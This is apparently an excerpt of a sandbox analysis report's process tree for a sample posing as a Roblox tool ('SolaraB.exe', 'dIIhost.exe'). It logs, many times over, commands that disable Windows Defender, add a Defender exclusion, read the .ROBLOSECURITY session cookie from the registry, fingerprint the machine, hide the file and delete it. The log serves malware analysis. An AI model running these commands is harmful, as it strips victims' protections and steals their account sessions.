        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        46⤵
        
        PID:4012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        46⤵
        
        PID:3620
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        47⤵
        
        PID:2572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        46⤵
        
        PID:3684
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        47⤵
        
        PID:4092
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        46⤵
        
        PID:4632
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        46⤵
        
        PID:1784
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        46⤵
        
        PID:216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        46⤵
        
        PID:2172
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        46⤵
        Detects videocard installed
        
        PID:1600
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        47⤵
        
        PID:816
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
        46⤵
        
        PID:2136
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        47⤵
        Runs ping.exe
        
        PID:840
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        45⤵
        
        PID:2396
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        46⤵
        
        PID:1556
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        47⤵
        
        PID:2464
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        48⤵
        
        PID:568
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        44⤵
        
        PID:2428
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        44⤵
        
        PID:640
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        45⤵
        
        PID:3544
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        46⤵
        
        PID:3644
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        47⤵
        
        PID:640
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        47⤵
        
        PID:1096
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        43⤵
        
        PID:4664
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        43⤵
        
        PID:640
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        44⤵
        
        PID:1208
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        45⤵
        
        PID:3448
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        46⤵
        
        PID:2064
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        42⤵
        
        PID:5080
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        43⤵
        
        PID:1076
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        43⤵
        Views/modifies file attributes
        
        PID:3816
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
        43⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2112
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        44⤵
        
        PID:3100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        43⤵
        
        PID:2064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        43⤵
        
        PID:4352
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        43⤵
        
        PID:4200
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        44⤵
        
        PID:5052
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        43⤵
        
        PID:2316
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        43⤵
        
        PID:740
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        43⤵
        
        PID:4780
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        43⤵
        
        PID:368
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        43⤵
        Detects videocard installed
        
        PID:5004
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        44⤵
        
        PID:2560
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
        43⤵
        
        PID:1328
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        44⤵
        Runs ping.exe
        
        PID:3232
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        42⤵
        
        PID:4936
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        43⤵
        
        PID:844
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        44⤵
        
        PID:3936
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        45⤵
        
        PID:2468
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        41⤵
        
        PID:2268
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        41⤵
        Modifies registry class
        
        PID:2340
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        42⤵
        
        PID:3912
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        43⤵
        
        PID:3408
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        44⤵
        
        PID:4924
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        40⤵
        Drops file in Drivers directory
        
        PID:4100
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        41⤵
        
        PID:2460
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        41⤵
        Views/modifies file attributes
        
        PID:656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        41⤵
        
        PID:4748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        41⤵
        
        PID:3708
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        41⤵
        
        PID:208
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        41⤵
        
        PID:1656
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        41⤵
        
        PID:2464
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        41⤵
        
        PID:4780
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        41⤵
        
        PID:4200
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        41⤵
        Detects videocard installed
        
        PID:4068
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
        41⤵
        
        PID:4188
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        42⤵
        
        PID:3608
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        42⤵
        Runs ping.exe
        
        PID:3232
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        40⤵
        Checks computer location settings
        Modifies registry class
        
        PID:5080
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        41⤵
        
        PID:864
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        42⤵
        
        PID:5088
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        43⤵
        
        PID:4304
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        39⤵
        
        PID:2848
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        39⤵
        Checks computer location settings
        Modifies registry class
        
        PID:1404
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        40⤵
        Checks computer location settings
        
        PID:3988
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        41⤵
        
        PID:3036
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        42⤵
        
        PID:2312
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        38⤵
        Drops file in Drivers directory
        
        PID:4876
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        39⤵
        
        PID:3088
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        39⤵
        Views/modifies file attributes
        
        PID:3044
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        40⤵
        
        PID:3428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3184
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        39⤵
        
        PID:3196
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        39⤵
        
        PID:1548
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        39⤵
        
        PID:4100
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        39⤵
        
        PID:4156
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        39⤵
        
        PID:4252
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        39⤵
        
        PID:4040
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        39⤵
        
        PID:2604
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        39⤵
        Detects videocard installed
        
        PID:4068
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
        39⤵
        
        PID:3876
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        40⤵
        
        PID:3796
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        40⤵
        Runs ping.exe
        
        PID:2116
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        38⤵
        Checks computer location settings
        Modifies registry class
        
        PID:1160
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        39⤵
        Checks computer location settings
        
        PID:1556
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        40⤵
        
        PID:4252
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        41⤵
        
        PID:3248
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        37⤵
        
        PID:2572
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        37⤵
        Modifies registry class
        
        PID:640
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        38⤵
        Checks computer location settings
        
        PID:4392
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        39⤵
        
        PID:3152
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        40⤵
        
        PID:644
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        36⤵
        Drops file in Drivers directory
        
        PID:1164
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        37⤵
        
        PID:1416
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        37⤵
        Views/modifies file attributes
        
        PID:2948
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        37⤵
        
        PID:452
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        37⤵
        
        PID:4940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        37⤵
        
        PID:3776
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        37⤵
        
        PID:960
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        37⤵
        
        PID:2880
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        37⤵
        
        PID:776
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        37⤵
        
        PID:3592
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        37⤵
        Detects videocard installed
        
        PID:568
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        38⤵
        
        PID:4504
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
        37⤵
        
        PID:2320
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        38⤵
        Runs ping.exe
        
        PID:4332
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        36⤵
        Checks computer location settings
        Modifies registry class
        
        PID:4068
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        37⤵
        
        PID:4100
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        38⤵
        
        PID:4012
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        39⤵
        
        PID:2224
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        35⤵
        
        PID:180
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        35⤵
        Modifies registry class
        
        PID:2776
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        36⤵
        Checks computer location settings
        
        PID:740
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        37⤵
        
        PID:1208
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        38⤵
        
        PID:3816
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        34⤵
        Drops file in Drivers directory
        
        PID:4592
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        35⤵
        
        PID:2020
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        35⤵
        Views/modifies file attributes
        
        PID:3892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4188
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        35⤵
        
        PID:4940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        35⤵
        
        PID:3292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        35⤵
        
        PID:5052
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        36⤵
        
        PID:552
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        35⤵
        
        PID:4996
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        35⤵
        
        PID:3408
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        35⤵
        
        PID:3092
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        35⤵
        
        PID:816
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        35⤵
        Detects videocard installed
        
        PID:2716
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
        35⤵
        
        PID:4772
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        36⤵
        Runs ping.exe
        
        PID:2404
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        34⤵
        Checks computer location settings
        Modifies registry class
        
        PID:1328
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        35⤵
        Checks computer location settings
        
        PID:1548
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        36⤵
        
        PID:3608
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        37⤵
        
        PID:2716
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        37⤵
        
        PID:4784
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        33⤵
        
        PID:3816
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        33⤵
        Modifies registry class
        
        PID:2560
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        34⤵
        
        PID:2240
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        35⤵
        
        PID:2172
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        36⤵
        
        PID:2772
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        32⤵
        Drops file in Drivers directory
        
        PID:616
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        33⤵
        
        PID:3796
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        34⤵
        
        PID:3168
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        33⤵
        Views/modifies file attributes
        
        PID:1836
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        34⤵
        
        PID:1336
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4824
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        33⤵
        
        PID:4604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        33⤵
        
        PID:3960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        33⤵
        
        PID:2460
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        33⤵
        
        PID:368
        
        C:\Windows\System32\Wbem\wmic.exe
        
